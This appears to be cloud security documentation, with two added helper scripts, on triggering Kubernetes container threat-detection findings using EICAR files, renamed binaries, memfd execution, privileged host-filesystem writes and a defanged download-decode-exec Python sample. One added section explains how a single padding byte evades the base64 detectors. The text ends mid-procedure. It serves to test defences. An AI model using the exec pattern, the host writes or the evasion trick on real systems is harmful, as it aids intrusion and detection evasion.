To trigger a Defense Evasion: Base64 Encoded Shell Script Executed finding, a process must have echo or base64 as an argument and IyEvYmluL2Jhc2gK as an argument. IyEvYmluL2Jhc2gK is the base64 encoding of #!/bin/bash followed by a newline, the first line of a bash script. This example uses the latest Ubuntu 24.04 image. echo is executed with the IyEvYmluL2Jhc2gK argument. This action is flagged as suspicious because it mimics the behavior observed when an attacker decodes an encoded script in order to execute malicious code.

  1. Set environment variables.

  2. In Cloud Shell, fetch credentials for the cluster so that kubectl can reach its control plane:

    gcloud container clusters get-credentials $CLUSTER_NAME \
      --zone $ZONE \
      --project $PROJECT

  3. Run echo with IyEvYmluL2Jhc2gK as an argument:

    • x86 node:

      tag="ktd-test-base64-elf-file-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
        --restart=Never \
        --rm=true -i \
        --image marketplace.gcr.io/google/ubuntu2404:latest \
        "$tag" -- bash -c \
        "echo IyEvYmluL2Jhc2gK"

    • ARM node:

      tag="ktd-test-base64-elf-file-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
        --restart=Never \
        --rm=true -i \
        --image marketplace.gcr.io/google/ubuntu2404:latest \
        --overrides='{"apiVersion": "v1", "spec": { "nodeSelector":
          {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":
          "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",
          "value": "arm64" } ]}}' \
        "$tag" -- bash -c \
        "echo IyEvYmluL2Jhc2gK"

This test procedure creates a Defense Evasion: Base64 Encoded Shell Script Executed finding that you can view in Security Command Center, and in Cloud Logging if you've configured Logging for Container Threat Detection. Viewing findings in Cloud Logging is only available if you activate the Premium or Enterprise tier of Security Command Center.
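The three Base64 detectors above (ELF File Command Line, Encoded Python Script Executed, Encoded Shell Script Executed) each key on a fixed base64 string that the page lists but does not derive. The shell functions below are an added example, not code from the page or from Google: they rebuild each marker from the plaintext it encodes, so you can confirm what the detector is really matching, and they show the consequence of base64 working in 3-byte groups, namely that the marker only appears when the interesting bytes sit at the start of the encoded data. The detector internals are not public; the conclusions drawn here follow only from the markers as this page states them.

```shell
#!/bin/sh
# Added example (not from the page): the three Defense Evasion detectors above
# key on fixed base64 prefixes. These functions reproduce those markers from
# the plaintext they encode and show when a payload would, or would not,
# carry one. Needs only printf, base64 and tr.

# Base64-encode the bytes described by a printf format (octal escapes keep
# this portable between bash and dash).
b64() { printf "$1" | base64 | tr -d '\n'; }

# Base64 ELF File Command Line marker: the ELF magic \177ELF followed by the
# class byte (2 = 64-bit) and the data-encoding byte (1 = little-endian).
elf_marker() { b64 '\177ELF\002\001'; }

# Base64 Encoded Shell Script Executed marker: "#!/bin/bash" plus a newline.
shell_marker() { b64 '#!/bin/bash\n'; }

# A Python script that starts with "import <module>". Base64 encodes 3 bytes
# into 4 characters, so the last two characters of the "aW1wb3J0IH" marker
# depend on the byte after the space: module names starting with p through z
# (sys, socket, subprocess, requests, ...) match it, "os" or "base64" do not.
python_script() { b64 "import $1\n"; }

# Does an encoded payload start with a marker? This page describes the
# detectors as matching the marker in a command-line argument.
starts_with() { case "$1" in "$2"*) return 0 ;; *) return 1 ;; esac; }
contains()    { case "$1" in *"$2"*) return 0 ;; *) return 1 ;; esac; }

# The same shell script shifted by one leading byte: the 3-byte alignment
# changes, and the fixed marker no longer appears anywhere in the encoding.
shifted_shell_script() { b64 ' #!/bin/bash\n'; }
```

The shifted script is the caveat to keep in mind when reading these findings: a fixed-prefix marker is cheap and precise, but it is also trivial to sidestep with a single byte of leading padding, so treat these three detectors as a signal for careless use of encoded payloads rather than as a guarantee against them.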

Defense Evasion: Disable or Modify Linux Audit System (Preview)

To trigger a Disable or Modify Linux Audit System finding, modify one of the host's auditing-related configuration files. This example deploys the latest Ubuntu 24.04 image, mounts the host's root filesystem into the container, and then modifies /etc/systemd/journald.conf.

This is a file monitoring detector and has specific GKE version requirements.

  1. Set environment variables.

  2. In Cloud Shell, fetch credentials for the cluster so that kubectl can reach its control plane:

    gcloud container clusters get-credentials $CLUSTER_NAME \
      --zone $ZONE \
      --project $PROJECT

  3. Execute a binary that modifies one of the host's audit-related configuration files, such as /etc/systemd/journald.conf.

    • x86 node:

      tag="ktd-test-audit-mod-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
        --restart=Never --rm=true -ti --image ubuntu "$tag" \
        --overrides='{"apiVersion": "v1", "spec": {
          "containers":[{"command": ["sh", "-c", "/bin/echo >> /host/etc/systemd/journald.conf"],
          "name": "'$tag'", "image": "marketplace.gcr.io/google/ubuntu2404:latest",
          "securityContext": {"privileged": true},
          "volumeMounts":[{"mountPath": "/host/", "name": "host-mount",
          "readOnly": false}]}],
          "volumes": [{"name": "host-mount","hostPath": {"path": "/"}}]}}'

    • ARM node:

      tag="ktd-test-audit-mod-arm-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
        --restart=Never --rm=true -ti --image ubuntu "$tag" \
        --overrides='{"apiVersion": "v1", "spec": {
          "containers":[{"command": ["sh", "-c", "/bin/echo >> /host/etc/systemd/journald.conf"],
          "name": "'$tag'", "image": "marketplace.gcr.io/google/ubuntu2404:latest",
          "securityContext": {"privileged": true},
          "volumeMounts":[{"mountPath": "/host/", "name": "host-mount",
          "readOnly": false}]}],
          "volumes": [{"name": "host-mount","hostPath": {"path": "/"}}],
          "nodeSelector": {"kubernetes.io/arch":"arm64"}, "tolerations":[{ "effect":
          "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",
          "value": "arm64" }] }}'

This test procedure triggers a Disable or Modify Linux Audit System finding that you can view in Security Command Center and, if you have configured Logging for Container Threat Detection, in Cloud Logging. Viewing findings in Cloud Logging is only available if you activate the Premium or Enterprise tier of Security Command Center at the organization level.

Defense Evasion: Launch Code Compiler Tool In Container

To trigger a Defense Evasion: Launch Code Compiler Tool In Container (Preview) finding, a code compiler tool must execute within a container. This example uses the latest Ubuntu 24.04 image. It copies /bin/ls and renames the copy to gcc10 (another compiler name such as clang would also work), then executes it with compiler-style arguments. This behavior is flagged as suspicious because it can indicate an attempt to compile and execute malicious code within the container to evade detection or modify its behavior.

  1. Set environment variables.

  2. In Cloud Shell, fetch credentials for the cluster so that kubectl can reach its control plane:

    gcloud container clusters get-credentials $CLUSTER_NAME \
      --zone $ZONE \
      --project $PROJECT

  3. Execute a compiler binary like gcc10 with appropriate arguments:

    • x86 node:

      tag="ktd-test-launch-code-compiler-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
        --restart=Never \
        --rm=true -i \
        --image marketplace.gcr.io/google/ubuntu2404:latest \
        "$tag" -- bash -c \
        "cp /bin/ls /tmp/gcc10; /tmp/gcc10 -o /tmp/gcc10.o"

    • ARM node:

      tag="ktd-test-launch-code-compiler-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
        --restart=Never \
        --rm=true -i \
        --image marketplace.gcr.io/google/ubuntu2404:latest \
        --overrides='{"apiVersion": "v1", "spec": { "nodeSelector":
          {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":
          "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",
          "value": "arm64" } ]}}' \
        "$tag" -- bash -c \
        "cp /bin/ls /tmp/gcc10; /tmp/gcc10 -o /tmp/gcc10.o"

This test procedure creates a Defense Evasion: Launch Code Compiler Tool In Container finding that you can view in Security Command Center and in Cloud Logging if you've configured Logging for Container Threat Detection. Viewing findings in Cloud Logging is only available if you activate the Premium or Enterprise tier of Security Command Center.

Defense Evasion: Root Certificate Installed (Preview)

To trigger a Root Certificate Installed finding, create a root certificate file on the host from a container. This example deploys the latest Ubuntu 24.04 image and mounts the host's root filesystem into the container. It then creates an empty certificate file at a path where system CA bundles are kept (/etc/pki/tls/certs/ca-bundle.crt). The file is empty, so no certificate is actually trusted, but the path is created on the node; run this only on a disposable test cluster.

This is a file monitoring detector and has specific GKE version requirements.

  1. Set environment variables.

  2. Use Cloud Shell to access the cluster control plane:

    gcloud container clusters get-credentials $CLUSTER_NAME \
        --zone $ZONE \
        --project $PROJECT

  3. Install a certificate file onto the host from a container.

    • x86 node:

      tag="ktd-test-cert-install-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
          --restart=Never --rm=true -ti --image ubuntu "$tag" \
          --overrides='{"apiVersion": "v1", "spec": {
            "containers":[{"command": ["sh", "-c", "mkdir -p /host/etc/pki/tls/certs; /bin/touch /host/etc/pki/tls/certs/ca-bundle.crt"],
            "name": "'$tag'", "image": "marketplace.gcr.io/google/ubuntu2404:latest",
            "securityContext": {"privileged": true},
            "volumeMounts":[{"mountPath": "/host/", "name": "host-mount",
            "readOnly": false}]}],
            "volumes": [{"name": "host-mount","hostPath": {"path": "/"}}]}}'

    • ARM node:

      tag="ktd-test-cert-install-arm-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
          --restart=Never --rm=true -ti --image ubuntu "$tag" \
          --overrides='{"apiVersion": "v1", "spec": {
            "containers":[{"command": ["sh", "-c", "mkdir -p /host/etc/pki/tls/certs; /bin/touch /host/etc/pki/tls/certs/ca-bundle.crt"],
            "name": "'$tag'", "image": "marketplace.gcr.io/google/ubuntu2404:latest",
            "securityContext": {"privileged": true},
            "volumeMounts":[{"mountPath": "/host/", "name": "host-mount",
            "readOnly": false}]}],
            "volumes": [{"name": "host-mount","hostPath": {"path": "/"}}],
            "nodeSelector": {"kubernetes.io/arch":"arm64"}, "tolerations":[{ "effect":
            "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",
            "value": "arm64" }] }}'

This test procedure triggers a Root Certificate Installed finding that you can view in Security Command Center and, if you have configured Logging for Container Threat Detection, in Cloud Logging. Viewing findings in Cloud Logging is only available if you activate the Premium or Enterprise tier of Security Command Center at the organization level.

Execution: Added Malicious Binary Executed

To trigger an Execution: Added Malicious Binary Executed finding, drop a malicious binary in your container and execute it. This example deploys the latest Ubuntu 24.04 image, creates a simulated malicious file, and then executes it. The binary's execution is unexpected because the simulated malicious binary wasn't part of the original container image, and because the binary is an EICAR test file, which is classified as malicious by threat intelligence.

  1. Set environment variables.

  2. Use Cloud Shell to access the cluster control plane:

    gcloud container clusters get-credentials $CLUSTER_NAME \
        --zone $ZONE \
        --project $PROJECT

  3. Drop the EICAR binary and execute it:

    • x86 node:

      tag="ktd-test-added-malicious-binary-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      eicar='X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*'
      kubectl run \
          --restart=Never \
          --rm=true -i \
          --image marketplace.gcr.io/google/ubuntu2404:latest \
          "$tag" -- sh -c \
          "touch /tmp/test_mal_file; echo -n '$eicar' > /tmp/test_mal_file; chmod 700 /tmp/test_mal_file; /tmp/test_mal_file; sleep 10"

    • ARM node:

      tag="ktd-test-added-malicious-binary-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      eicar='X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*'
      kubectl run \
          --restart=Never \
          --rm=true -i \
          --image marketplace.gcr.io/google/ubuntu2404:latest \
          --overrides='{"apiVersion": "v1", "spec": { "nodeSelector":
            {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":
            "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",
            "value": "arm64" } ]}}' \
          "$tag" -- sh -c \
          "touch /tmp/test_mal_file; echo -n '$eicar' > /tmp/test_mal_file; chmod 700 /tmp/test_mal_file; /tmp/test_mal_file; sleep 10"

This test procedure creates an Execution: Added Malicious Binary Executed finding that you can view in Security Command Center, and in Cloud Logging if you've configured Logging for Container Threat Detection. Viewing findings in Cloud Logging is only available if you activate the Premium or Enterprise tier of Security Command Center.

For noise reduction, when you first create a container, Container Threat Detection temporarily filters Execution: Added Malicious Binary Executed findings. To see all Execution: Added Malicious Binary Executed findings while a container is being set up, prefix your container name or Pod name with ktd-test, as in the example.
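Every test procedure on this page repeats the same kubectl run pattern: a ktd-test-prefixed Pod name with a UTC timestamp and, on ARM, an --overrides block that pins the Pod to an arm64 node pool with a nodeSelector and toleration. The helper below is an added example, not part of the original page or of Google's tooling; it factors that pattern into shell functions (ktd_tag, ktd_overrides and ktd_run are names chosen here) so that any of the page's test commands can be run on either architecture with one call.

```shell
#!/usr/bin/env bash
# Added helper, not from the original page. Factors out the kubectl run
# pattern that every test procedure on this page repeats. The function names
# (ktd_tag, ktd_overrides, ktd_run) are assumptions chosen for this example.

# Print a Pod name with the ktd-test prefix, which exempts the Pod from the
# start-up noise filter, followed by a UTC timestamp in the page's format.
ktd_tag() {
  printf 'ktd-test-%s-%s\n' "$1" "$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
}

# Print the --overrides JSON that schedules the Pod on an arm64 node pool
# (the same nodeSelector and toleration the ARM variants above use), or
# nothing for x86, which needs no override. Unknown architectures fail.
ktd_overrides() {
  case "$1" in
    arm64)
      printf '%s' '{"apiVersion": "v1", "spec": { "nodeSelector": {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect": "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal", "value": "arm64" } ]}}'
      ;;
    amd64|x86|x86_64)
      ;;
    *)
      echo "ktd_overrides: unsupported architecture '$1'" >&2
      return 1
      ;;
  esac
}

# Run one test command in a throwaway Pod on the requested architecture.
#   ktd_run ARCH NAME IMAGE SHELL COMMAND
# Example (the Container Escape test from this page, on an ARM node pool):
#   ktd_run arm64 container-escape marketplace.gcr.io/google/ubuntu2404:latest \
#     bash "cp /bin/ls /tmp/botb-linux-arm64; /tmp/botb-linux-arm64 -autopwn"
# Assumes kubectl is installed and already points at the test cluster.
ktd_run() {
  local arch="$1" name="$2" image="$3" shell="$4" cmd="$5"
  local tag overrides
  tag="$(ktd_tag "$name")"
  overrides="$(ktd_overrides "$arch")" || return 1
  if [ -n "$overrides" ]; then
    kubectl run --restart=Never --rm=true -i --image "$image" \
      --overrides="$overrides" "$tag" -- "$shell" -c "$cmd"
  else
    kubectl run --restart=Never --rm=true -i --image "$image" \
      "$tag" -- "$shell" -c "$cmd"
  fi
}
```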

Execution: Added Malicious Library Loaded

To trigger an Execution: Added Malicious Library Loaded finding, add a malicious library in your container and load it. This example deploys the latest Ubuntu 24.04 image, creates a simulated malicious library, and then loads it using mmap. The library loading is unexpected because the simulated malicious library wasn't part of the original container image and because the library is an EICAR test file, which is classified as malicious by threat intelligence.

  1. Set environment variables.

  2. Use Cloud Shell to access the cluster control plane:

    gcloud container clusters get-credentials $CLUSTER_NAME \
        --zone $ZONE \
        --project $PROJECT

  3. Add the EICAR file and load it:

    • x86 node:

      tag="ktd-test-added-malicious-library-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      eicar='X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*'
      kubectl run \
          --restart=Never \
          --rm=true -i \
          --image marketplace.gcr.io/google/ubuntu2404:latest \
          "$tag" -- sh -c "
            apt-get update && apt-get install -y gcc libc-dev --no-install-recommends > /dev/null 2>&1;
            echo -n '$eicar' > /tmp/test_mal_lib;
            cat << 'EOF' > /tmp/loader.c
      #include <fcntl.h>
      #include <sys/mman.h>
      #include <sys/stat.h>
      #include <unistd.h>
      #include <stdlib.h>
      int main(int argc, char *argv[]) {
         int fd = open(argv[1], O_RDONLY);
         if (fd == -1) return 1;
         struct stat sb;
         if (fstat(fd, &sb) == -1) return 1;
         void* addr = mmap(NULL, sb.st_size, PROT_EXEC, MAP_PRIVATE, fd, 0);
         if (addr == MAP_FAILED) return 1;
         write(1, addr, sb.st_size);
         munmap(addr, sb.st_size);
         close(fd);
         return 0;
      }
      EOF
            gcc /tmp/loader.c -o /tmp/loader && /tmp/loader /tmp/test_mal_lib
            sleep 10"

    • ARM node:

      tag="ktd-test-added-malicious-library-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      eicar='X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*'
      kubectl run \
          --restart=Never \
          --rm=true -i \
          --image marketplace.gcr.io/google/ubuntu2404:latest \
          --overrides='{"apiVersion": "v1", "spec": { "nodeSelector":
            {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":
            "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",
            "value": "arm64" } ]}}' \
          "$tag" -- sh -c "
            apt-get update && apt-get install -y gcc libc-dev --no-install-recommends > /dev/null 2>&1;
            echo -n '$eicar' > /tmp/test_mal_lib;
            cat << 'EOF' > /tmp/loader.c
      #include <fcntl.h>
      #include <sys/mman.h>
      #include <sys/stat.h>
      #include <unistd.h>
      #include <stdlib.h>
      int main(int argc, char *argv[]) {
         int fd = open(argv[1], O_RDONLY);
         if (fd == -1) return 1;
         struct stat sb;
         if (fstat(fd, &sb) == -1) return 1;
         void* addr = mmap(NULL, sb.st_size, PROT_EXEC, MAP_PRIVATE, fd, 0);
         if (addr == MAP_FAILED) return 1;
         write(1, addr, sb.st_size);
         munmap(addr, sb.st_size);
         close(fd);
         return 0;
      }
      EOF
            gcc /tmp/loader.c -o /tmp/loader && /tmp/loader /tmp/test_mal_lib
            sleep 10"

This test procedure creates an Execution: Added Malicious Library Loaded finding that you can view in Security Command Center, and in Cloud Logging if you've configured Logging for Container Threat Detection. Viewing findings in Cloud Logging is only available if you activate the Premium or Enterprise tier of Security Command Center.

For noise reduction, when you first create a container, Container Threat Detection temporarily filters Execution: Added Malicious Library Loaded findings. To see all Execution: Added Malicious Library Loaded findings while a container is being set up, prefix your container name or Pod name with ktd-test, as in the example.

Execution: Container Escape

To trigger an Execution: Container Escape finding, place a binary in your container and execute it. This example deploys the latest Ubuntu 24.04 image, copies /bin/ls to another location, renames it to a suspicious tool name (botb-linux-amd64, or botb-linux-arm64 on an ARM node), and executes it with additional arguments. This action is considered suspicious because the execution simulates behavior consistent with a container escape attempt.

  1. Set environment variables.

  2. Use Cloud Shell to access the cluster control plane:

    gcloud container clusters get-credentials $CLUSTER_NAME \
        --zone $ZONE \
        --project $PROJECT

  3. Drop a Container Exploitation tool binary like botb-linux-amd64 and execute it:

    • x86 node:

      tag="ktd-test-container-escape-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
          --restart=Never \
          --rm=true -i \
          --image marketplace.gcr.io/google/ubuntu2404:latest \
          "$tag" -- bash -c \
          "cp /bin/ls /tmp/botb-linux-amd64; /tmp/botb-linux-amd64 -autopwn"

    • ARM node:

      tag="ktd-test-container-escape-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
          --restart=Never \
          --rm=true -i \
          --image marketplace.gcr.io/google/ubuntu2404:latest \
          --overrides='{"apiVersion": "v1", "spec": { "nodeSelector":
            {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":
            "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",
            "value": "arm64" } ]}}' \
          "$tag" -- bash -c \
          "cp /bin/ls /tmp/botb-linux-arm64; /tmp/botb-linux-arm64 -autopwn"

This test procedure creates an Execution: Container Escape finding that you can view in Security Command Center, and in Cloud Logging if you've configured Logging for Container Threat Detection. Viewing findings in Cloud Logging is only available if you activate the Premium or Enterprise tier of Security Command Center.

Execution: Fileless Execution in /memfd:

To trigger an Execution: Fileless Execution in /memfd: finding, a process must be executed from the /memfd: in-memory file system. This example uses the latest Python image. The /bin/ls utility is copied into an anonymous file created with memfd_create, which appears under /memfd:, and that copied binary is then executed. The execution of a binary under /memfd: is flagged as suspicious because it mimics the behavior of a program executing from memory to avoid file-based detections.

  1. Set environment variables.

  2. Use Cloud Shell to access the cluster control plane:

    gcloud container clusters get-credentials $CLUSTER_NAME \
        --zone $ZONE \
        --project $PROJECT

  3. Create a privileged container and open bash to execute commands:

    • x86 node:

      tag="ktd-test-malicious-python-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
          --restart=Never \
          --rm=true -i \
          --image python:latest \
          "$tag" -- python -c "import os,sys,time
      time.sleep(10)
      f = open('/bin/ls','rb')
      execdata = f.read()
      f.close()
      fd = os.memfd_create('', 0)
      fname = '/proc/self/fd/{}'.format(fd)
      f = open(fname,'wb')
      f.write(execdata)
      f.close()
      args = ['/bin']
      os.execve(fname, args, os.environ)"

    • ARM node:

      tag="ktd-test-malicious-python-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
          --restart=Never \
          --rm=true -i \
          --image python:3-buster \
          --overrides='{"apiVersion": "v1", "spec": { "nodeSelector":
            {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":
            "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",
            "value": "arm64" } ]}}' \
          "$tag" -- python -c "import os,sys,time
      time.sleep(10)
      f = open('/bin/ls','rb')
      execdata = f.read()
      f.close()
      fd = os.memfd_create('', 0)
      fname = '/proc/self/fd/{}'.format(fd)
      f = open(fname,'wb')
      f.write(execdata)
      f.close()
      args = ['/bin']
      os.execve(fname, args, os.environ)"

This test procedure creates an Execution: Fileless Execution in /memfd: finding that you can view in Security Command Center, and in Cloud Logging if you've configured Logging for Container Threat Detection. Viewing findings in Cloud Logging is only available if you activate the Premium or Enterprise tier of Security Command Center.

Execution: Ingress Nightmare Vulnerability Execution

To trigger an Execution: Ingress Nightmare Vulnerability Execution (Preview) finding, execute the nginx binary in your container. This example deploys the latest Ubuntu 24.04 image, copies /bin/ls to another location, renames it to an Nginx binary (nginx), and executes it with additional arguments referencing the /proc file system. This action is deemed suspicious because it simulates behavior consistent with the Ingress Nightmare exploit (CVE-2025-1974), thereby indicating potential remote code execution.

  1. Set environment variables.

  2. Use Cloud Shell to access the cluster control plane:

    gcloud container clusters get-credentials $CLUSTER_NAME \
        --zone $ZONE \
        --project $PROJECT

  3. Create an Nginx binary like nginx and execute it while accessing the /proc file system:

    • x86 node:

      tag="ktd-test-ingress-nightmare-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
          --restart=Never \
          --rm=true -i \
          --image marketplace.gcr.io/google/ubuntu2404:latest \
          "$tag" -- bash -c \
          "cp /bin/ls /tmp/nginx; /tmp/nginx /proc/1/fd/1"

    • ARM node:

      tag="ktd-test-ingress-nightmare-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
          --restart=Never \
          --rm=true -i \
          --image marketplace.gcr.io/google/ubuntu2404:latest \
          --overrides='{"apiVersion": "v1", "spec": { "nodeSelector":
            {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":
            "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",
            "value": "arm64" } ]}}' \
          "$tag" -- bash -c \
          "cp /bin/ls /tmp/nginx; /tmp/nginx /proc/1/fd/1"

This test procedure creates an Execution: Ingress Nightmare Vulnerability Execution finding that you can view in Security Command Center and in Cloud Logging if you've configured Logging for Container Threat Detection. Viewing findings in Cloud Logging is only available if you activate the Premium or Enterprise tier of Security Command Center.

Execution: Kubernetes Attack Tool Execution

To trigger an Execution: Kubernetes Attack Tool Execution finding, place a binary in your container and execute it. This example deploys the latest Ubuntu 24.04 image, copies /bin/ls to another location, renames it to a suspicious tool name (amicontained), and executes it. This action is considered suspicious because it simulates behavior consistent with a potential Kubernetes attack tool execution attempt.

  1. Set environment variables.

  2. Use Cloud Shell to access the cluster control plane:

    gcloud container clusters get-credentials $CLUSTER_NAME \
        --zone $ZONE \
        --project $PROJECT

  3. Drop a Kubernetes Attack tool binary like amicontained and execute it:

    • x86 node:

      tag="ktd-test-kubernetes-attack-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
          --restart=Never \
          --rm=true -i \
          --image marketplace.gcr.io/google/ubuntu2404:latest \
          "$tag" -- bash -c \
          "cp /bin/ls /tmp/amicontained; /tmp/amicontained"

    • ARM node:

      tag="ktd-test-kubernetes-attack-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
          --restart=Never \
          --rm=true -i \
          --image marketplace.gcr.io/google/ubuntu2404:latest \
          --overrides='{"apiVersion": "v1", "spec": { "nodeSelector":
            {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":
            "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",
            "value": "arm64" } ]}}' \
          "$tag" -- bash -c \
          "cp /bin/ls /tmp/amicontained; /tmp/amicontained"

This test procedure creates an Execution: Kubernetes Attack Tool Execution finding that you can view in Security Command Center, and in Cloud Logging if you've configured Logging for Container Threat Detection. Viewing findings in Cloud Logging is only available if you activate the Premium or Enterprise tier of Security Command Center.

Execution: Local Reconnaissance Tool Execution

To trigger an Execution: Local Reconnaissance Tool Execution finding, place a binary in your container and execute it. This example deploys the latest Ubuntu 24.04 image, copies /bin/ls to another location, renames it to a suspicious tool name (linenum.sh), and executes it. This action is considered suspicious because executing the renamed binary simulates behavior consistent with a local reconnaissance attempt.

  1. Set environment variables.

  2. Use Cloud Shell to access the cluster control plane:

    gcloud container clusters get-credentials $CLUSTER_NAME \
        --zone $ZONE \
        --project $PROJECT

  3. Introduce a Local Reconnaissance tool binary like linenum.sh and execute it:

    • x86 node:

      tag="ktd-test-local-reconn-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
          --restart=Never \
          --rm=true -i \
          --image marketplace.gcr.io/google/ubuntu2404:latest \
          "$tag" -- bash -c \
          "cp /bin/ls /tmp/linenum.sh; /tmp/linenum.sh"

    • ARM node:

      tag="ktd-test-local-reconn-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
          --restart=Never \
          --rm=true -i \
          --image marketplace.gcr.io/google/ubuntu2404:latest \
          --overrides='{"apiVersion": "v1", "spec": { "nodeSelector":
            {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":
            "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",
            "value": "arm64" } ]}}' \
          "$tag" -- bash -c \
          "cp /bin/ls /tmp/linenum.sh; /tmp/linenum.sh"

This test procedure creates an Execution: Local Reconnaissance Tool Execution finding that you can view in Security Command Center, and in Cloud Logging if you've configured Logging for Container Threat Detection. Viewing findings in Cloud Logging is only available if you activate the Premium or Enterprise tier of Security Command Center.

Execution: Malicious Python Executed

Preview

This feature is subject to the "Pre-GA Offerings Terms" in the General Service Terms section of the Service Specific Terms. Pre-GA features are available "as is" and might have limited support. For more information, see the launch stage descriptions.

To trigger an Execution: Malicious Python Executed finding, execute the Python script in the following procedure in your container.

The procedure deploys the latest Python image, copies in Python code that appears malicious, and then executes it. To trigger a detection, the Python code must appear malicious to the detector.

  1. Set environment variables.

  2. Use Cloud Shell to access the cluster control plane:

    gcloud container clusters get-credentials $CLUSTER_NAME \
        --zone $ZONE \
        --project $PROJECT

  3. Execute the following script in a new container.

    This Python code originated from a honeypot. However, it was modified so that it does not execute the malicious binary. Running the script won't cause malicious activity in your container. The binary at the referenced URL does not exist, and attempting to follow the URL results in a 404 error. This is expected. The attempt to download, decode, and execute a binary using an inline script is what triggers the detection.

    • x86 node:

      tag="ktd-test-malicious-python-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
          --restart=Never \
          --rm=true -i \
          --image marketplace.gcr.io/google/python:latest \
          "$tag" -- python -c "import urllib
      import base64
      import os
      url = 'https://pastebin.com/raw/Z'
      page = base64.b64decode(urllib.urlopen(url).read())
      page = ''
      f = os.popen(str(page))
      url = 'https://pastebin.com/raw/Z'
      d = 'https://pastebin.com/raw/Z'
      page = base64.b64decode(urllib.urlopen(url).read())
      page = ''
      exec(page)"

    • ARM node:

      tag="ktd-test-malicious-python-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
          --restart=Never \
          --rm=true -i \
          --image python:3-buster \
          --overrides='{"apiVersion": "v1", "spec": { "nodeSelector":
            {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":
            "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",
            "value": "arm64" } ]}}' \
          "$tag" -- python -c "import urllib
      import base64
      import os
      url = 'https://pastebin.com/raw/Z'
      page = base64.b64decode(urllib.urlopen(url).read())
      page = ''
      f = os.popen(str(page))
      url = 'https://pastebin.com/raw/Z'
      d = 'https://pastebin.com/raw/Z'
      page = base64.b64decode(urllib.urlopen(url).read())
      page = ''
      exec(page)"

This test procedure creates an Execution: Malicious Python Executed finding that you can view in Security Command Center and in Cloud Logging if you configured logging for Container Threat Detection. Viewing findings in Cloud Logging is only available if you activate the Premium or Enterprise tier of Security Command Center.

Execution: Modified Malicious Binary Executed

To trigger an Execution: Modified Malicious Binary Executed finding, modify an existing file in your container into a malicious binary and execute it. This example deploys the latest Ubuntu 24.04 image, overwrites /etc/issue with the EICAR test file, and then executes it. The binary's execution is unexpected because /etc/issue, which was part of the original container image, is modified at container runtime into an EICAR test binary, and the EICAR file is a known malicious file according to threat intelligence.

  1. Set environment variables.

  2. Use Cloud Shell to access the cluster control plane:

    gcloud container clusters get-credentials $CLUSTER_NAME \
        --zone $ZONE \
        --project $PROJECT

  3. Drop the EICAR binary and execute it:

    • x86 node:

      tag="ktd-test-modified-malicious-binary-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      eicar='X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*'
      kubectl run \
          --restart=Never \
          --rm=true -i \
          --image marketplace.gcr.io/google/ubuntu2404:latest \
          "$tag" -- sh -c \
          "echo -n '$eicar' > /etc/issue; chmod 700 /etc/issue; /etc/issue; sleep 10"

    • ARM node:

